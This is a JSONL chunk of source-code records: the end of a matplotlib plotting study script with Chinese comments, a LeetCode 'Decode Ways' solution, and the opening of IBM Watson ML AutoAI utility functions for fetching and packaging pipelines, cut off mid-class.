label.set_zorder(2)\n# label.set_fontsize(12)\n# label.set_bbox(dict(facecolor='white',edgecolor='None',alpha=0.7))\n\n\n'散点图'\n# n=1024\n# x=np.random.normal(0,1,n)\n# y=np.random.normal(0,1,n)\n# T=np.arctan2(y,x)#产生随机的颜色\n# plt.scatter(x,y,s=75,c=T,alpha=0.5)\n# plt.xlim((-1.5,1.5))\n# plt.ylim((-1.5,1.5))\n# plt.xticks(())#x轴坐标没有标签\n# plt.yticks(())\n# plt.show()\n\n'柱状图'\n# n=12\n# x=np.arange(n)\n# y1=(1-x/float(n))*np.random.uniform(0.5,1.0,n)\n# y2=(1-x/float(n))*np.random.uniform(0.5,1.0,n)\n# plt.bar(x,+y1,facecolor='#ADD8E6',edgecolor='white')\n# plt.bar(x,-y2,facecolor='#ff9999',edgecolor='white')\n# for x,y in zip(x,y1):\n# plt.text(x,y+0.05,'%.2f'%y,ha='center',va='bottom')\n# x=np.arange(n)\n# for x,y in zip(x,y2):\n# plt.text(x,-y-0.05,'-%.2f'%y,ha='center',va='top')\n# plt.xlim(-5,n)\n# plt.xticks(())\n# plt.ylim(-1.25,1.25)\n# plt.yticks(())\n\n\n'等高线图'\ndef f(x,y):\n return (1-x/2+x**5+y**3)*np.exp(-x**2-y**2)\nn=250\nx=np.linspace(-3,3,n)\ny=np.linspace(-3,3,n)\nX,Y=np.meshgrid(x,y)#x,y绑定网格的输入值\nplt.contourf(X,Y,f(X,Y),4,alpha=0.75,cmap='hot')#定义高线和颜色和8表示化成10部分\nC=plt.contour(X,Y,f(X,Y),4,colors='black',linewidth=.5)#画出等高线\nplt.clabel(C,inline=True,fontsize=10)#每个等高线有标签\n\n'图形'\n# a=np.array([]).reshape(())\n# plt.imshow(a,interpolation='nearest',cmap='bone',origin='lower')#origin还有uuper,interpolation有很多形式\n# plt.colorbar(shrink=0.9)#添加右边条形说明\n# plt.xticks(())\n# plt.yticks(())\n# plt.show()\n\n'3D画图'\nfrom mpl_toolkits.mplot3d import Axes3D\nfig=plt.figure()#画框\nax=Axes3D(fig)#坐标轴\nX=np.arange(-4,4,0.25)\nY=np.arange(-4,4,0.25)\nX,Y=np.meshgrid(X,Y)#底面\nR=np.sqrt(X**2+Y**2)\nZ=np.sin(R)\n\nax.plot_surface(X,Y,Z,rstride=2,cstride=2,cmap=plt.get_cmap('rainbow'))\nax.contourf(X,Y,Z,zdir='z',offset=-2,cmap='rainbow')#等高线的位置\nax.set_zlim(-2,2)\n\n\n'创建小图'\nplt.figure()\nplt.subplot(2,1,1)\nplt.plot([0,1],[0,1])\nplt.subplot(2,3,4)\nplt.plot([0,1],[0,2])\nplt.subplot(2,3,5)\nplt.plot([0,1],[0,3])\nplt.subplot(2,3,6)\nplt.plot([0,1],[0,4])\n\n'subplot分格显示'\n#plt.subplot2grid()\n# plt.figure()\n# ax1=plt.subplot2grid((3,3),(0,0),colspan=3,rowspan=1)\n# ax1.plot([1,2],[1,2])\n# ax1.set_xlabel('x')\n# ax2=plt.subplot2grid((3,3),(1,0),colspan=2)\n# ax3=plt.subplot2grid((3,3),(1,2),rowspan=2)\n# ax4=plt.subplot2grid((3,3),(2,0))\n# ax5=plt.subplot2grid((3,3),(2,1))\n\n#plt.gridspec\n# import matplotlib.gridspec as gridspec\n# plt.figure()\n# gs=gridspec.GridSpec(3,3)\n# ax1=plt.subplot(gs[0,:])\n# ax2=plt.subplot(gs[1,:2])\n# ax3=plt.subplot(gs[1:,2])\n# ax4=plt.subplot(gs[-1,0])\n# ax5=plt.subplot(gs[-1,-2])\n\n\n#plt.subplots()\nf,((ax11,ax12),(ax21,ax22))=plt.subplots(2,2,sharex=True,sharey=True)\nax11.scatter([1,2],[1,2])\n\n'图中图'\nfig=plt.figure()\nx=[1,2,3,4,5,6,7]\ny=[1,3,4,2,5,8,6]\nleft,bottom,width,height=0.1,0.1,0.8,0.8\nax1=fig.add_axes([left,bottom,width,height])\nax1.plot(x,y,'r')\nax1.set_xlabel('X')\nax1.set_ylabel('Y')\nax1.set_title('title')\nleft,bottom,width,height=0.2,0.6,0.25,0.25\nax2=fig.add_axes([left,bottom,width,height])\nax2.plot(y,x,'b')\nax2.set_xlabel('X')\nax2.set_ylabel('Y')\nax2.set_title('title inside 1')\n\nplt.axes([0.6,0.2,0.25,0.25])\nplt.plot(y[::-1],x,'g')\nplt.xlabel('X')\nplt.ylabel('Y')\nplt.title('title inside 1')\n\n\n'次坐标'\nx=np.arange(0,10,0.1)\ny1=0.05*x**2\ny2=-1*y1\nfig,ax1=plt.subplots()\nax2=ax1.twinx()\nax1.plot(x,y1,'g--')\nax2.plot(x,y2,'b-')\nax1.set_xlabel('X data')\nax1.set_ylabel('Y1',color='g')\nax2.set_ylabel('Y2',color='b')\nax1.set_title('test')\n\n'动图,必须在ide中编辑'\nfrom matplotlib import animation\nfig1,ax=plt.subplots()\nx=np.arange(0,2*np.pi,0.01)\nline,=ax.plot(x,np.sin(x))\ndef animation1(i):\n line.set_ydata(np.sin(x+i/10))#更新\n return line,\ndef init():\n line.set_ydata(np.sin(x))\n return line,\n#随着时间变动的function,闪过100个时间点,隔20毫秒更新一次\nani=animation.FuncAnimation(fig=fig1,func=animation1,frames=100,init_func=init,interval=20,blit=False)#interval表示每隔20秒更新一次\n\nplt.show()","sub_path":"study/matplotlib_study.py","file_name":"matplotlib_study.py","file_ext":"py","file_size_in_byte":7134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"426414197","text":"\"\"\"\nhttps://leetcode.com/problems/decode-ways/\n\nDP[i][0] => # of decode ways decode (i)-th digit as a letter.\nDP[i][1] => # of decode ways deocde (i-1) & (i) together. \n\nIf s[i] != '0', DP[i][0] = DP[i-1][0] + DP[i-1][1]\nElse, DP[i][0] = 0\nIf 1<= int(s[i-1] + s[i]) <= 26, DP[i][1] = DP[i-2][0] + DP[i-2][1]\n\nBe careful about the case if s[i-1] == '0'.\n\nTime complexity: O(N), N = len(s)\n\"\"\"\nclass Solution:\n def numDecodings(self, s: str) -> int:\n N = len(s)\n dp = [[0, 0] for _ in range(N)]\n if s[0] != '0':\n dp[0][0] = 1\n for i in range(1, N):\n if s[i] != '0':\n dp[i][0] = dp[i-1][0] + dp[i-1][1]\n else:\n dp[i][0] = 0\n if s[i-1] != '0' and (0 < int(s[i-1:i+1]) <= 26):\n dp[i][1] = sum(dp[i-2]) if i >= 2 else 1\n return sum(dp[-1])","sub_path":"0091_DecodeWays.py","file_name":"0091_DecodeWays.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"469242151","text":"# (C) Copyright IBM Corp. 2020.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n__all__ = [\n 'fetch_pipelines',\n 'load_file_from_file_system',\n 'load_file_from_file_system_nonautoai',\n 'NextRunDetailsGenerator',\n 'prepare_auto_ai_model_to_publish_normal_scenario',\n 'prepare_auto_ai_model_to_publish_notebook_normal_scenario',\n 'prepare_auto_ai_model_to_publish',\n 'remove_file',\n 'ProgressGenerator',\n 'is_ipython',\n 'try_import_lale',\n 'try_load_dataset',\n 'check_dependencies_versions',\n 'try_import_autoai_libs',\n 'try_import_tqdm',\n 'try_import_xlrd',\n 'try_import_graphviz',\n 'prepare_cos_client',\n 'create_model_download_link',\n 'create_summary',\n 'prepare_auto_ai_model_to_publish_notebook',\n 'get_node_and_runtime_index',\n 'download_experiment_details_from_file',\n 'prepare_model_location_path',\n 'download_wml_pipeline_details_from_file',\n 'init_cos_client',\n 'check_graphviz_binaries',\n 'try_import_joblib',\n 'get_sw_spec_and_type_based_on_sklearn',\n 'validate_additional_params_for_optimizer',\n 'is_list_composed_from_enum',\n 'validate_optimizer_enum_values'\n]\n\nimport io\nimport json\nimport os\nimport enum\nimport inspect\nfrom contextlib import redirect_stdout\nfrom functools import wraps\nfrom subprocess import check_call\nfrom sys import executable\nfrom tarfile import open as open_tar\nfrom typing import Dict, Union, Tuple, List, TYPE_CHECKING, Optional, Any\nfrom warnings import warn\nfrom zipfile import ZipFile\nfrom collections.abc import Sequence\n\nimport pkg_resources\nimport requests\nfrom packaging import version\n\nfrom .enums import (RegressionAlgorithms, ClassificationAlgorithms, ForecastingAlgorithms, Transformers,\n Metrics, TShirtSize, PredictionType)\nfrom .errors import (MissingPipeline, DataFormatNotSupported, LibraryNotCompatible,\n CannotInstallLibrary, CannotDownloadTrainingDetails, CannotDownloadWMLPipelineDetails,\n VisualizationFailed, AdditionalParameterIsUnexpected, InvalidSequenceValue, NoAvailableMetrics)\n\nif TYPE_CHECKING:\n from io import BytesIO, BufferedIOBase\n from pandas import DataFrame\n from collections import OrderedDict\n from sklearn.pipeline import Pipeline\n from ibm_watson_machine_learning import APIClient\n from ibm_watson_machine_learning.helpers import DataConnection, S3Connection\n from ibm_boto3 import resource, client\n\n\ndef create_model_download_link(file_path: str):\n \"\"\"\n Creates download link and shows it in the jupyter notebook\n\n Parameters\n ----------\n file_path: str, required\n \"\"\"\n if is_ipython():\n from IPython.display import display\n from ibm_watson_machine_learning.utils import create_download_link\n display(create_download_link(file_path))\n\n\ndef fetch_pipelines(run_params: dict,\n path: str,\n wml_client: 'APIClient',\n pipeline_name: str = None,\n load_pipelines: bool = False,\n store: bool = False) -> Tuple[Union[None, Dict[str, 'Pipeline']], bool]:\n \"\"\"\n Helper function to download and load computed AutoAI pipelines (sklearn pipelines).\n\n Parameters\n ----------\n run_params: dict, required\n Fetched details of the run/fit.\n\n path: str, required\n Local system path indicates where to store downloaded pipelines.\n\n pipeline_name: str, optional\n Name of the pipeline to download, if not specified, all pipelines are downloaded.\n\n load_pipelines: bool, optional\n Indicator if we load and return downloaded piepelines.\n\n store: bool, optional\n Indicator to store pipelines in local filesystem\n\n wml_client: APIClient, required\n\n Returns\n -------\n List of sklearn Pipelines or None if load_pipelines is set to False.\n \"\"\"\n\n def check_pipeline_nodes(pipeline: dict, request_json: dict, wml_client) -> bool:\n \"\"\"\n Automate check all pipeline nodes to find xgboost or lightgbm dependency.\n \"\"\"\n xgboost_estimators = ['XGBClassifierEstimator', 'XGBRegressorEstimator', 'XGBClassifier', 'XGBRegressor']\n lightgbm_estimators = ['LGBMClassifierEstimator', 'LGBMRegressorEstimator', 'LGBMClassifier', 'LGBMRegressor']\n\n # note: check dependencies for estimators and other packages\n estimator_name = pipeline['context']['intermediate_model'].get('pipeline_nodes', [None])[-1]\n if estimator_name in xgboost_estimators:\n check_lale = check_dependencies_versions(request_json, wml_client, 'xgboost')\n\n elif estimator_name in lightgbm_estimators:\n check_lale = check_dependencies_versions(request_json, wml_client, 'lightgbm')\n\n else:\n check_lale = check_dependencies_versions(request_json, wml_client, None)\n\n # TODO: When another package estimators will be available update above!\n # --- end note\n\n return check_lale\n\n joblib = try_import_joblib()\n\n path = os.path.abspath(path)\n pipelines_names = []\n pipelines = {}\n check_lale = True\n\n if wml_client.ICP:\n model_paths = []\n\n # note: iterate over all computed pipelines\n for pipeline in run_params['entity']['status'].get('metrics', []):\n\n # note: fetch and create model paths from file system\n model_path = pipeline['context']['intermediate_model']['location']['model']\n # --- end note\n\n # note: populate available pipeline names\n if pipeline_name is None: # checking all pipelines\n model_paths.append(model_path)\n pipelines_names.append(\n f\"Pipeline_{pipeline['context']['intermediate_model']['name'].split('P')[-1]}\")\n\n # note: check dependencies for estimators\n request_json = download_request_json(run_params, pipelines_names[-1], wml_client)\n check_lale = check_pipeline_nodes(pipeline, request_json, wml_client)\n\n\n # checking only chosen pipeline\n elif pipeline_name == f\"Pipeline_{pipeline['context']['intermediate_model']['name'].split('P')[-1]}\":\n model_paths.append(model_path)\n pipelines_names = [f\"Pipeline_{pipeline['context']['intermediate_model']['name'].split('P')[-1]}\"]\n\n # note: check dependencies for estimators and other packages\n request_json = download_request_json(run_params, pipelines_names[-1], wml_client)\n check_lale = check_pipeline_nodes(pipeline, request_json, wml_client)\n\n break\n # --- end note\n\n if load_pipelines:\n # Disable printing to suppress warning from ai4ml\n with redirect_stdout(open(os.devnull, \"w\")):\n for model_path, pipeline_name in zip(model_paths, pipelines_names):\n pipelines[pipeline_name] = joblib.load(load_file_from_file_system(wml_client=wml_client,\n file_path=model_path))\n\n if store:\n for name, pipeline in pipelines.items():\n local_model_path = os.path.join(path, name)\n joblib.dump(pipeline, local_model_path)\n print(f\"Selected pipeline stored under: {local_model_path}\")\n\n # note: display download link to the model\n create_model_download_link(local_model_path)\n # --- end note\n\n else:\n from ibm_boto3 import client\n cos_client = client(\n service_name='s3',\n endpoint_url=run_params['entity']['results_reference']['connection']['endpoint_url'],\n aws_access_key_id=run_params['entity']['results_reference']['connection']['access_key_id'],\n aws_secret_access_key=run_params['entity']['results_reference']['connection']['secret_access_key']\n )\n buckets = []\n filenames = []\n keys = []\n\n for pipeline in run_params['entity']['status'].get('metrics', []):\n model_number = pipeline['context']['intermediate_model']['name'].split('P')[-1]\n model_phase = chose_model_output(model_number)\n\n if pipeline['context']['phase'] == model_phase:\n model_path = f\"{pipeline['context']['intermediate_model']['location']['model']}\"\n\n if pipeline_name is None:\n buckets.append(run_params['entity']['results_reference']['location']['bucket'])\n filenames.append(\n f\"{path}/Pipeline_{pipeline['context']['intermediate_model']['name'].split('P')[-1]}.pickle\")\n keys.append(model_path)\n pipelines_names.append(\n f\"Pipeline_{pipeline['context']['intermediate_model']['name'].split('P')[-1]}\")\n\n # note: check dependencies for estimators and other packages\n request_json = download_request_json(run_params, pipelines_names[-1], wml_client)\n check_lale = check_pipeline_nodes(pipeline, request_json, wml_client)\n\n elif pipeline_name == f\"Pipeline_{pipeline['context']['intermediate_model']['name'].split('P')[-1]}\":\n buckets = [run_params['entity']['results_reference']['location']['bucket']]\n filenames = [\n f\"{path}/Pipeline_{pipeline['context']['intermediate_model']['name'].split('P')[-1]}.pickle\"]\n keys = [model_path]\n pipelines_names = [f\"Pipeline_{pipeline['context']['intermediate_model']['name'].split('P')[-1]}\"]\n\n # note: check dependencies for estimators and other packages\n request_json = download_request_json(run_params, pipelines_names[-1], wml_client)\n check_lale = check_pipeline_nodes(pipeline, request_json, wml_client)\n\n break\n\n for bucket, filename, key, name in zip(buckets, filenames, keys, pipelines_names):\n cos_client.download_file(Bucket=bucket, Filename=filename, Key=key)\n if load_pipelines:\n\n # Disable printing to suppress warning from ai4ml\n with redirect_stdout(open(os.devnull, \"w\")):\n pipelines[name] = joblib.load(filename)\n\n if not store:\n if os.path.exists(filename):\n os.remove(filename)\n\n else:\n print(f\"Selected pipeline stored under: {filename}\")\n\n # note: display download link to the model\n create_model_download_link(filename)\n # --- end note\n\n if load_pipelines and pipelines:\n return pipelines, check_lale\n\n elif load_pipelines:\n raise MissingPipeline(\n pipeline_name if pipeline_name is not None else \"global_output pipeline\",\n reason=\"The name of the pipeline is incorrect or there are no pipelines computed.\")\n\n\ndef load_file_from_file_system(wml_client: 'APIClient',\n file_path: str,\n stream: bool = True) -> 'io.BytesIO':\n \"\"\"\n Load file into memory from the file system.\n\n Parameters\n ----------\n wml_client: APIClient, required\n WML v4 client.\n\n file_path: str, required\n Path in the file system of the file.\n\n stream: bool, optional\n Indicator to stream data content.\n\n Returns\n -------\n Sklearn Pipeline\n \"\"\"\n # note: prepare the file path\n file_path = file_path.split('auto_ml/')[-1]\n\n if wml_client.default_project_id:\n file_path = f\"{file_path}?project_id={wml_client.default_project_id}\"\n\n else:\n file_path = f\"{file_path}?space_id={wml_client.default_space_id}\"\n # --- end note\n\n buffer = io.BytesIO()\n response_with_model = requests.get(\n url=f\"{wml_client.data_assets._href_definitions.get_wsd_model_attachment_href()}auto_ml/{file_path}\",\n headers=wml_client._get_headers(),\n stream=stream,\n verify=False)\n if stream:\n for data in response_with_model.iter_content():\n buffer.write(data)\n else:\n buffer.write(response_with_model.content)\n\n buffer.seek(0)\n\n return buffer\n\n\ndef load_file_from_file_system_nonautoai(wml_client: 'APIClient',\n file_path: str,\n stream: bool = True) -> 'io.BytesIO':\n \"\"\"\n Load file into memory from the file system.\n\n Parameters\n ----------\n wml_client: APIClient, required\n WML v4 client.\n\n file_path: str, required\n Path in the file system of the file.\n\n stream: bool, optional\n Indicator to stream data content.\n\n Returns\n -------\n File content\n \"\"\"\n # note: prepare the file path\n\n if wml_client.default_project_id:\n file_path = f\"{file_path}?project_id={wml_client.default_project_id}\"\n\n else:\n file_path = f\"{file_path}?space_id={wml_client.default_space_id}\"\n # --- end note\n\n buffer = io.BytesIO()\n\n response_with_model = requests.get(\n url=f\"{wml_client.data_assets._href_definitions.get_wsd_model_attachment_href()}{file_path}\",\n headers=wml_client._get_headers(),\n stream=stream,\n verify=False)\n\n if stream:\n for data in response_with_model.iter_content():\n buffer.write(data)\n else:\n buffer.write(response_with_model.content)\n\n buffer.seek(0)\n\n return buffer\n\nclass NextRunDetailsGenerator:\n \"\"\"\n Generator class to produce next list of run details.\n\n Parameters\n ----------\n wml_client: APIClient, required\n WML Client Instance\n \"\"\"\n\n def __init__(self, wml_client: 'APIClient', href: str) -> None:\n self.wml_client = wml_client\n self.next_href = href\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.next_href is not None:\n response = requests.get(\n url=f\"{self.wml_client.wml_credentials['url']}{self.next_href}\",\n headers=self.wml_client._get_headers(),\n verify=not self.wml_client.ICP)\n details = response.json()\n self.next_href = details.get('next', {'href': None})['href']\n return details.get('resources', [])\n\n else:\n raise StopIteration\n\n\ndef preprocess_request_json(request_json: Dict, space_id: str) -> Dict:\n \"\"\"Removes unused parts of request.json file got from autoai training.\n Allow to further store model in user space.\"\"\"\n # note: if training was on project_id, change it to space_id as we can deploy only on space\n if 'project_id' in request_json:\n request_json.pop('project_id')\n\n request_json['space_id'] = space_id\n request_json.pop('pipeline') # not needed for other space\n # --- end note\n return request_json\n\n\ndef chose_model_output(model_number: str, is_ml_metrics: bool = True, is_ts_metrics: bool = False) -> str:\n \"\"\"Chose correct path for particular model number\"\"\"\n if is_ml_metrics:\n model_number = int(model_number)\n hpo_c_numbers = (4, 8, 12, 16)\n cognito_numbers = (3, 7, 11, 15)\n hpo_d_numbers = (2, 6, 10, 14)\n pre_hpo_d_numbers = (1, 5, 9, 13)\n\n if model_number in pre_hpo_d_numbers:\n return 'pre_hpo_d_output'\n\n elif model_number in hpo_d_numbers:\n return 'hpo_d_output'\n\n elif model_number in cognito_numbers:\n return 'cognito_output'\n\n elif model_number in hpo_c_numbers:\n return 'hpo_c_output'\n\n else:\n return 'global_output'\n\n elif is_ts_metrics:\n return 'after_pipeline_execution'\n\n\ndef prepare_auto_ai_model_to_publish_notebook_normal_scenario(\n pipeline_model: Union['Pipeline', 'TrainablePipeline'],\n result_connection,\n cos_client,\n run_params: Dict,\n space_id: str) -> Union[Tuple[str, Dict[str, dict]]]:\n \"\"\"\n Prepares autoai model to publish in Watson Studio via COS.\n Option only for auto-gen notebooks with correct result references on COS.\n\n Parameters\n ----------\n pipeline_model: Union['Pipeline', 'TrainablePipeline'], required\n model object to publish\n\n result_connection: DataConnection, required\n Connection object with COS credentials and all needed locations for jsons\n\n cos_client: ibm_boto3.resource, required\n initialized COS client\n\n run_params: dictionary, required\n Dictionary with training details\n\n space_id: str, required\n\n Returns\n -------\n String with path to the saved model and jsons in COS.\n \"\"\"\n path = result_connection.location._model_location\n model_number = pipeline_model.split('_')[-1]\n run_id = path.split('/data/')[0].split('/')[-1]\n request_path = f\"{path.split('/data/')[0]}/assets/{run_id}_P{model_number}_{chose_model_output(model_number)}/resources/wml_model/request.json\"\n\n bucket = result_connection.location.bucket\n cos_client.meta.client.download_file(Bucket=bucket, Filename='request.json', Key=request_path)\n with open('request.json', 'r') as f:\n request_str = f.read()\n\n # note: only if there was 1 estimator during training\n if 'content_location' not in request_str:\n request_path = f\"{path.split('/data/')[0]}/assets/{run_id}_P{model_number}_compose_model_type_output/resources/wml_model/request.json\"\n cos_client.meta.client.download_file(Bucket=bucket, Filename='request.json', Key=request_path)\n with open('request.json', 'r') as f:\n request_str = f.read()\n\n request_json: Dict[str, dict] = json.loads(request_str)\n request_json['content_location']['connection'] = run_params['entity']['results_reference']['connection']\n request_json = preprocess_request_json(request_json, space_id)\n artifact_name = f\"autoai_sdk{os.path.sep}{pipeline_model}.pickle\"\n\n return artifact_name, request_json\n\n\n# TODO: remove this function\ndef prepare_auto_ai_model_to_publish_notebook(pipeline_model: Union['Pipeline', 'TrainablePipeline'],\n result_connection,\n cos_client,\n obm: Optional[bool] = False) -> Union[Tuple[Dict[str, dict], str], str]:\n \"\"\"\n Prepares autoai model to publish in Watson Studio via COS.\n Option only for auto-gen notebooks with correct result references on COS.\n\n Parameters\n ----------\n pipeline_model: Union['Pipeline', 'TrainablePipeline'], required\n model object to publish\n\n result_connection: DataConnection, required\n Connection object with COS credentials and all needed locations for jsons\n\n cos_client: ibm_boto3.resource, required\n initialized COS client\n\n obm: bool, optional\n Indicator if we need to extract OBM data\n\n Returns\n -------\n String with path to the saved model and jsons in COS.\n \"\"\"\n joblib = try_import_joblib()\n\n artifact_type = \".gzip\"\n\n artifact_name = f\"artifact_auto_ai_model{artifact_type}\"\n model_artifact_name = f\"model_.tar.gz\"\n wml_pipeline_definition_name = \"pipeline-model.json\"\n obm_model_name = \"obm_model.zip\"\n temp_model_name = '__temp_model.pickle'\n\n # note: path to the json describing the autoai POD specification\n path = result_connection.location._model_location.split('model.pickle')[0]\n pipeline_model_json_path = f\"{path}pipeline-model.json\"\n schema_path = f\"{path}schema.json\"\n\n bucket = result_connection.location.bucket\n\n # note: Check if we have OBM experiment and get paths for obm model and schema\n if obm:\n obm_model_path = f\"{path.split('/data/')[0]}/data/obm/model.zip\"\n schema_path = f\"{path.split('/data/')[0]}/data/obm/schemas.json\"\n cos_client.meta.client.download_file(Bucket=bucket, Filename=obm_model_name, Key=obm_model_path)\n\n # note: need to download model schema and wml pipeline definition json\n cos_client.meta.client.download_file(Bucket=bucket, Filename=wml_pipeline_definition_name,\n Key=pipeline_model_json_path)\n cos_client.meta.client.download_file(Bucket=bucket, Filename='schema.json', Key=schema_path)\n\n with open('schema.json', 'r') as f:\n schema_json = f.read()\n\n # note: update the schema, it has wrong field types\n schema_json = schema_json.replace('fieldType', 'type')\n # --- end note\n\n # note: saved passed model as pickle, for further tar.gz packaging\n joblib.dump(pipeline_model, temp_model_name)\n # --- end note\n\n # note: create a tar.gz file with model pickle, name it as 'model_run_id.tar.gz', model.pickle inside\n with open_tar(model_artifact_name, 'w:gz') as tar:\n tar.add(temp_model_name, arcname='model.pickle')\n\n remove_file(filename=temp_model_name)\n # --- end note\n\n # note: create final zip to publish on WML cloud v4 GA\n with ZipFile(artifact_name, 'w') as zip_file:\n if obm:\n # note: write order is important!\n zip_file.write(obm_model_name)\n zip_file.write(model_artifact_name)\n zip_file.write(wml_pipeline_definition_name)\n\n remove_file(filename=model_artifact_name)\n remove_file(filename=wml_pipeline_definition_name)\n if obm:\n remove_file(filename=obm_model_name)\n # --- end note\n\n return json.loads(schema_json), artifact_name\n\n\ndef prepare_auto_ai_model_to_publish_normal_scenario(\n pipeline_model: Union['Pipeline', 'TrainablePipeline'],\n run_params: dict,\n run_id: str,\n wml_client: 'APIClient',\n space_id: str) -> Union[Tuple[str, Dict[str, dict]]]:\n \"\"\"\n Helper function to specify `content_location` statement for AutoAI models to store in repository.\n\n Parameters\n ----------\n pipeline_model: Union['Pipeline', 'TrainablePipeline'], required\n Model that will be prepared for an upload.\n\n run_params: dict, required\n Fetched details of the run/fit.\n\n run_id: str, required\n Fit/run ID associated with the model.\n\n wml_client: APIClient, required\n\n space_id: str, required\n\n Returns\n -------\n If cp4d: Dictionary with model schema and artifact name to upload, stored temporally in the user local file system.\n else: path name to the stored model in COS\n \"\"\"\n request_json: Dict[str, dict] = download_request_json(run_params, pipeline_model, wml_client)\n # note: fill connection details\n request_json['content_location']['connection'] = run_params['entity']['results_reference']['connection']\n # note: if training was on project_id, change it to space_id as we can deploy only on space\n request_json = preprocess_request_json(request_json, space_id)\n artifact_name = f\"autoai_sdk{os.path.sep}{pipeline_model}.pickle\"\n\n return artifact_name, request_json\n\n\n# TODO: remove this function\ndef prepare_auto_ai_model_to_publish(\n pipeline_model: Union['Pipeline', 'TrainablePipeline'],\n run_params: dict,\n run_id: str,\n wml_client: 'APIClient') -> Union[Tuple[Dict[str, dict], str], str]:\n \"\"\"\n Helper function to download and load computed AutoAI pipelines (sklearn pipelines).\n Parameters\n ----------\n pipeline_model: Union['Pipeline', 'TrainablePipeline'], required\n Model that will be prepared for an upload.\n run_params: dict, required\n Fetched details of the run/fit.\n run_id: str, required\n Fit/run ID associated with the model.\n wml_client: APIClient, required\n Returns\n -------\n If cp4d: Dictionary with model schema and artifact name to upload, stored temporally in the user local file system.\n else: path name to the stored model in COS\n \"\"\"\n\n joblib = try_import_joblib()\n\n artifact_type = \".tar.gz\" if wml_client.ICP else \".gzip\"\n\n artifact_name = f\"artifact_auto_ai_model{artifact_type}\"\n model_artifact_name = f\"model_{run_id}.tar.gz\"\n wml_pipeline_definition_name = \"pipeline-model.json\"\n obm_model_name = \"obm_model.zip\"\n temp_model_name = '__temp_model.pickle'\n\n # note: prepare file paths of pipeline-model and schema (COS / file system location)\n pipeline_info = run_params['entity']['status'].get('metrics')[-1]\n pipeline_model_path = f\"{pipeline_info['context']['intermediate_model']['location']['pipeline_model']}\"\n schema_path = f\"{pipeline_info['context']['intermediate_model']['schema_location']}\"\n obm_model_path = None\n # --- end note\n\n # note: Check if we have OBM experiment and get paths for obm model and schema\n if 'obm' in run_params['entity']['status'].get('feature_engineering_components', {}):\n obm_model_path = f\"{pipeline_model_path.split('/data/')[0]}/data/obm/model.zip\"\n schema_path = f\"{pipeline_model_path.split('/data/')[0]}/data/obm/schemas.json\"\n\n if wml_client.ICP:\n # note: downloading pipeline-model.json and schema.json from file system on CP4D\n schema_json = load_file_from_file_system(wml_client=wml_client, file_path=schema_path).read().decode()\n pipeline_model_json = load_file_from_file_system(wml_client=wml_client,\n file_path=pipeline_model_path).read().decode()\n with open(wml_pipeline_definition_name, 'w') as f:\n f.write(pipeline_model_json)\n # --- end note\n\n # note: save obm model.zip locally\n if obm_model_path is not None:\n obm_model = load_file_from_file_system(wml_client=wml_client,\n file_path=obm_model_path).read().decode()\n\n with open(obm_model_name, 'w') as f:\n f.write(obm_model)\n # --- end note\n\n else:\n cos_client = init_cos_client(run_params['entity']['results_reference']['connection'])\n bucket = run_params['entity']['results_reference']['location']['bucket']\n\n # note: need to download model schema and wml pipeline definition json\n cos_client.meta.client.download_file(Bucket=bucket, Filename=wml_pipeline_definition_name,\n Key=pipeline_model_path)\n cos_client.meta.client.download_file(Bucket=bucket, Filename='schema.json', Key=schema_path)\n\n with open('schema.json', 'r') as f:\n schema_json = f.read()\n\n # note: save obm model.zip locally\n if obm_model_path is not None:\n cos_client.meta.client.download_file(Bucket=bucket, Filename=obm_model_name, Key=obm_model_path)\n # --- end note\n\n # note: update the schema, it has wrong field types and missing id\n schema_json = schema_json.replace('fieldType', 'type')\n # --- end note\n\n # note: saved passed model as pickle, for further tar.gz packaging\n joblib.dump(pipeline_model, temp_model_name)\n # --- end note\n\n # note: create a tar.gz file with model pickle, name it as 'model_run_id.tar.gz', model.pickle inside\n with open_tar(model_artifact_name, 'w:gz') as tar:\n tar.add(temp_model_name, arcname='model.pickle')\n\n remove_file(filename=temp_model_name)\n # --- end note\n\n with ZipFile(artifact_name, 'w') as zip_file:\n if obm_model_path is not None:\n # note: write order is important!\n zip_file.write(obm_model_name)\n zip_file.write(model_artifact_name)\n zip_file.write(wml_pipeline_definition_name)\n\n remove_file(filename=model_artifact_name)\n remove_file(filename=wml_pipeline_definition_name)\n if obm_model_path is not None:\n remove_file(filename=obm_model_name)\n # --- end note\n\n return json.loads(schema_json), artifact_name\n\n\ndef modify_pipeline_model_json(data_location: str, model_path: str) -> None:\n \"\"\"\n Change the location of KB model in pipeline-model.json\n\n Parameters\n ----------\n data_location: str, required\n pipeline-model.json data local path\n\n model_path: str, required\n Path to KB model stored in COS.\n \"\"\"\n with open(data_location, 'r') as f:\n data = json.load(f)\n\n data['pipelines'][0]['nodes'][-1]['parameters']['output_model']['location'] = f\"{model_path}model.pickle\"\n\n with open(data_location, 'w') as f:\n f.write(json.dumps(data))\n\n\ndef init_cos_client(connection: dict) -> 'resource':\n \"\"\"Initiate COS client for further usage.\"\"\"\n from ibm_botocore.client import Config\n from ibm_boto3 import resource\n\n if connection.get('auth_endpoint') is not None and connection.get('api_key') is not None:\n cos_client = resource(\n service_name='s3',\n ibm_api_key_id=connection['api_key'],\n ibm_auth_endpoint=connection['auth_endpoint'],\n config=Config(signature_version=\"oauth\"),\n endpoint_url=connection['endpoint_url']\n )\n\n else:\n cos_client = resource(\n service_name='s3',\n endpoint_url=connection['endpoint_url'],\n aws_access_key_id=connection['access_key_id'],\n aws_secret_access_key=connection['secret_access_key']\n )\n return cos_client\n\n\ndef remove_file(filename: str):\n \"\"\"Helper function to clean user local storage from temporary package files.\"\"\"\n if os.path.exists(filename):\n os.remove(filename)\n\n\nclass ProgressGenerator:\n def __init__(self):\n self.progress_messages = {\n \"pre_hpo_d_output\": 15,\n \"hpo_d_output\": 30,\n \"cognito_output\": 50,\n \"hpo_c_output\": 70,\n \"compose_model_type_output\": 